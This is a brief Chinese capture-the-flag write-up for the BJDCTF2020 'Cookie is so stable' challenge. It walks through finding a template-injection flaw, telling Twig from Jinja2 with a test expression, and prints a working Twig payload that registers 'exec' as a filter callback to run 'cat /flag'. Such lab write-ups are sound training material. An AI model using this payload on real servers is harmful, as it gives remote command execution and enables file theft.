[BJDCTF2020]Cookie is so stable
打开链接
先找线索,查看hint
但是并没有思路,查看其他页面,可以在FLag页面有个输入框
输入测试,发现存在ssti漏洞
用burp抓包,找到注入点
- 输入{{7*‘7’}},返回49表示是 Twig 模块
- 输入{{7*‘7’}},返回7777777表示是 Jinja2 模块
证明是Twig模板
然后查找flag
构造playload:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
得到flag
